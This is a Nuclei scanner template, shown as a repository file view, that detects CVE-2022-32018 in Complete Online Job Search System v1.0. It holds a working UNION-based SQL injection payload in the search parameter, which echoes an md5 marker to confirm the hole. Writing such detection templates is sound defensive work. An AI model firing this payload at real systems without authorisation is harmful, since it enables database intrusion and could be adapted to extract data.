nuclei-templates/cves/2022/CVE-2022-32018.yaml

29 lines
796 B
YAML
Raw Normal View History

2022-07-16 20:29:49 +00:00
id: CVE-2022-32018
info:
name: Complete Online Job Search System v1.0 - SQL Injection
author: arafatansari
severity: medium
description: |
Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=hiring&search=.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-32018
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md
2022-07-19 08:39:49 +00:00
metadata:
verified: true
2022-07-16 20:29:49 +00:00
tags: cve,cve2022,sqli
2022-07-19 08:39:49 +00:00
variables:
num: "999999999"
2022-07-16 20:29:49 +00:00
requests:
2022-07-19 08:39:49 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"
2022-07-16 20:29:49 +00:00
matchers:
- type: word
part: body
words:
2022-07-19 08:39:49 +00:00
- '{{md5({{num}})}}'